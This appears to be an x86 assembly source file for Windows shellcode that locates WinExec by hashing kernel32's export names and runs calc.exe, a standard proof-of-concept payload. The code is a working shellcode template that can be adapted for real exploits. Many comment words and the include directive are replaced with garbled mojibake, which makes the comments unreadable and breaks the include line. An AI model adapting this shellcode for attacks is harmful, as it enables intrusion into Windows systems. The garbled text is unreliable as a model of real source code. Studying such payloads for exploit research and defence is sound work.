; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; »ö¶È¡¿·×²è¡Ê¤¹¤ë¡Ë homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All ¸¢Íøs reserved. See COPYRIGHT.txt for ¾ÜºÙ¡Ê¤Ë½Ò¤Ù¤ë¡Ës.
BITS 32
; Windows x86 null-²òÊü¤¹¤ë¡¿¼«Í³¤Ê shellcode that ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ës calc.exe.
; ºîÉÊ in any »ÈÍÑ¡¿Å¬ÍÑ for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/º÷°ú.php/Àڤ곫¤¯¡¿¥¿¥¯¥·¡¼¡¿ÉÔÀµ¥¢¥¯¥»¥¹ing/Shellcode).
; This ¸«²ò¡¿ËÝÌõ¡¿ÈÇ uses 16-bit hashes.

%´Þ¤à 'w32-exec-calc-shellcode-hash-̾Êí¡Ê¤ËºÜ¤»¤ë¡Ë¡¿É½¡Ê¤Ë¤¢¤²¤ë¡Ë.asm'

%define B2W(b1,b2)                      (((b2) << 8) + (b1))
%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))

%ifdef STACK_ALIGN
    AND     SP, 0xFFFC
%endif
find_hash: ; Find ntdll's InInitOrder ̾Êí¡Ê¤ËºÜ¤»¤ë¡Ë¡¿É½¡Ê¤Ë¤¢¤²¤ë¡Ë of modules:
    XOR     ESI, ESI                    ; ESI = 0
    PUSH    ESI                         ; Stack = 0
    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the ¸½ºß¤Î module and find the next module:
    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and Í¢½Ð¡Ê¤¹¤ë¡Ë and »Ø̾¤¹¤ës ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ës of the module:
    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = Á껦¤¹¤ë(Í¢½Ð¡Ê¤¹¤ë¡Ë ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë)
    ADD     EBX, EBP                    ; EBX = &(Í¢½Ð¡Ê¤¹¤ë¡Ë ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë)
    MOV     ECX, [EBX + 0x18]           ; ECX = number of »Ø̾¤¹¤ë pointers
    JCXZ    next_module                 ; No »Ø̾¤¹¤ë pointers? Next module.
next_function_loop: ; Get the next µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö »Ø̾¤¹¤ë for hashing:
    MOV     EDI, [EBX + 0x20]           ; EDI = Á껦¤¹¤ë(»Ø̾¤¹¤ës ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë)
    ADD     EDI, EBP                    ; EDI = &(»Ø̾¤¹¤ës ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë)
    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = Á껦¤¹¤ë(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö »Ø̾¤¹¤ë)
    ADD     EDI, EBP                    ; EDI = &(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö »Ø̾¤¹¤ë)
    XOR     EAX, EAX                    ; EAX = 0
    CDQ                                 ; EDX = 0
hash_loop: ; Hash the µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö »Ø̾¤¹¤ë and compare with requested hash
    XOR     DL, [EDI]
    ROR     DX, BYTE hash_ror_value
    SCASB
    JNE     hash_loop
    CMP     DX, hash_kernel32_WinExec
    LOOPNE  next_function_loop          ; Not the ¸¢Íø hash and µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ös left in module? Next µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö
    JNE     next_module                 ; Not the ¸¢Íø hash and no µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ös left in module? Next module
    ; ÀßΩ¤¹¤ë the ¸¢Íø hash: get the ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê of the µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö:
    MOV     EDX, [EBX + 0x24]           ; ESI = Á껦¤¹¤ë ordinals ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë
    ADD     EDX, EBP                    ; ESI = &oridinals ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë
    MOVZX   EDX, WORD [EDX + 2 * ECX]   ; ESI = ordinal number of µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö
    MOV     EDI, [EBX + 0x1C]           ; EDI = Á껦¤¹¤ë ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë
    ADD     EDI, EBP                    ; EDI = &±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê ¡ÊÊÆ¡Ëê¾å¤²¤¹¤ë¡¿¡Ê±Ñ¡ËÄóµÄ¤¹¤ë
    ADD     EBP, [EDI + 4 * EDX]        ; EBP = &(µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö)
    ; create the calc.exe string
    PUSH    B2DW('.', 'e', 'x', 'e')    ; Stack = ".exe", 0
    PUSH    B2DW('c', 'a', 'l', 'c')    ; Stack = "calc.exe", 0
    PUSH    ESP                         ; Stack = &("calc.exe"), "calc.exe", 0
    XCHG    EAX, [ESP]                  ; Stack = 0, "calc.exe", 0
    PUSH    EAX                         ; Stack = &("calc.exe"), 0, "calc.exe", 0
    CALL    EBP                         ; WinExec(&("calc.exe"), 0);
    INT3                                ; ¾×ÆÍ¡¤ÄÆÍî